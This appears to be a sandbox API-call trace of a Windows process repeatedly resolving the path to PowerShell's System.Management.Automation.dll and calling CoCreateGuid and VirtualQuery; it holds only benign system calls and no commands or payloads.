	[0353.834] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x56438eb, Data2=0x48bf, Data3=0x4bdd, Data4=([0]=0xb7, [1]=0x2e, [2]=0x4d, [3]=0xf4, [4]=0xc8, [5]=0x77, [6]=0x49, [7]=0xc3))) returned 0x0
	[0353.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.835] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x157ec3d5, Data2=0x540a, Data3=0x424b, Data4=([0]=0xb1, [1]=0x55, [2]=0x85, [3]=0x42, [4]=0x62, [5]=0x99, [6]=0x71, [7]=0x5a))) returned 0x0
	[0353.835] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.835] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.835] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.835] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.835] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.835] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.835] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x3f724670, Data2=0xddc1, Data3=0x4775, Data4=([0]=0x83, [1]=0x5e, [2]=0x14, [3]=0x35, [4]=0x44, [5]=0x18, [6]=0xc7, [7]=0x20))) returned 0x0
	[0353.835] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.836] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.836] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.836] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.836] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.836] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.836] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x79525ac3, Data2=0x740e, Data3=0x44a9, Data4=([0]=0xa1, [1]=0x61, [2]=0xc5, [3]=0xce, [4]=0xbf, [5]=0x4e, [6]=0x52, [7]=0x82))) returned 0x0
	[0353.836] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.836] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.836] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.836] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.837] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0xdaffe8d2, Data2=0xd02d, Data3=0x4208, Data4=([0]=0xb9, [1]=0x68, [2]=0xaa, [3]=0x71, [4]=0xf2, [5]=0x10, [6]=0xd, [7]=0x19))) returned 0x0
	[0353.837] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x3811111d, Data2=0xe5ab, Data3=0x4944, Data4=([0]=0xbb, [1]=0x90, [2]=0xa0, [3]=0xb7, [4]=0x58, [5]=0xfe, [6]=0x8a, [7]=0x30))) returned 0x0
	[0353.837] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0xb46174ae, Data2=0x5428, Data3=0x425e, Data4=([0]=0xb8, [1]=0x9e, [2]=0xa3, [3]=0x7, [4]=0x0, [5]=0xe, [6]=0xc9, [7]=0xef))) returned 0x0
	[0353.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.838] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0xbe8bb171, Data2=0xcc55, Data3=0x4101, Data4=([0]=0xab, [1]=0x80, [2]=0x1, [3]=0xaa, [4]=0xc7, [5]=0x40, [6]=0x30, [7]=0xd3))) returned 0x0
	[0353.838] VirtualQuery (in: lpAddress=0x10af30, lpBuffer=0x10bdf0, dwLength=0x30 | out: lpBuffer=0x10bdf0*(BaseAddress=0x10a000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ba00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ba00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.838] VirtualQuery (in: lpAddress=0x10af30, lpBuffer=0x10bdf0, dwLength=0x30 | out: lpBuffer=0x10bdf0*(BaseAddress=0x10a000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.838] VirtualQuery (in: lpAddress=0x10afc0, lpBuffer=0x10be80, dwLength=0x30 | out: lpBuffer=0x10be80*(BaseAddress=0x10a000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.839] VirtualQuery (in: lpAddress=0x10af30, lpBuffer=0x10bdf0, dwLength=0x30 | out: lpBuffer=0x10bdf0*(BaseAddress=0x10a000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.839] VirtualQuery (in: lpAddress=0x10afc0, lpBuffer=0x10be80, dwLength=0x30 | out: lpBuffer=0x10be80*(BaseAddress=0x10a000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ba00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ba00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.840] VirtualQuery (in: lpAddress=0x10af30, lpBuffer=0x10bdf0, dwLength=0x30 | out: lpBuffer=0x10bdf0*(BaseAddress=0x10a000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.840] VirtualQuery (in: lpAddress=0x10afc0, lpBuffer=0x10be80, dwLength=0x30 | out: lpBuffer=0x10be80*(BaseAddress=0x10a000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.840] VirtualQuery (in: lpAddress=0x10af30, lpBuffer=0x10bdf0, dwLength=0x30 | out: lpBuffer=0x10bdf0*(BaseAddress=0x10a000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.840] VirtualQuery (in: lpAddress=0x10afc0, lpBuffer=0x10be80, dwLength=0x30 | out: lpBuffer=0x10be80*(BaseAddress=0x10a000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.840] VirtualQuery (in: lpAddress=0x10af30, lpBuffer=0x10bdf0, dwLength=0x30 | out: lpBuffer=0x10bdf0*(BaseAddress=0x10a000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.840] VirtualQuery (in: lpAddress=0x10afc0, lpBuffer=0x10be80, dwLength=0x30 | out: lpBuffer=0x10be80*(BaseAddress=0x10a000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.840] VirtualQuery (in: lpAddress=0x10af30, lpBuffer=0x10bdf0, dwLength=0x30 | out: lpBuffer=0x10bdf0*(BaseAddress=0x10a000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.840] VirtualQuery (in: lpAddress=0x10afc0, lpBuffer=0x10be80, dwLength=0x30 | out: lpBuffer=0x10be80*(BaseAddress=0x10a000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.841] VirtualQuery (in: lpAddress=0x10b830, lpBuffer=0x10c6f0, dwLength=0x30 | out: lpBuffer=0x10c6f0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.841] VirtualQuery (in: lpAddress=0x10b8c0, lpBuffer=0x10c780, dwLength=0x30 | out: lpBuffer=0x10c780*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.841] VirtualQuery (in: lpAddress=0x10b830, lpBuffer=0x10c6f0, dwLength=0x30 | out: lpBuffer=0x10c6f0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.841] VirtualQuery (in: lpAddress=0x10b8c0, lpBuffer=0x10c780, dwLength=0x30 | out: lpBuffer=0x10c780*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.841] VirtualQuery (in: lpAddress=0x10b8c0, lpBuffer=0x10c780, dwLength=0x30 | out: lpBuffer=0x10c780*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.841] VirtualQuery (in: lpAddress=0x10b830, lpBuffer=0x10c6f0, dwLength=0x30 | out: lpBuffer=0x10c6f0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.841] VirtualQuery (in: lpAddress=0x10b8c0, lpBuffer=0x10c780, dwLength=0x30 | out: lpBuffer=0x10c780*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.842] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x528e72b, Data2=0x76b7, Data3=0x4d64, Data4=([0]=0xbf, [1]=0xb2, [2]=0x23, [3]=0x66, [4]=0x77, [5]=0x4c, [6]=0xe6, [7]=0x17))) returned 0x0
	[0354.069] VirtualQuery (in: lpAddress=0x10b840, lpBuffer=0x10c700, dwLength=0x30 | out: lpBuffer=0x10c700*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
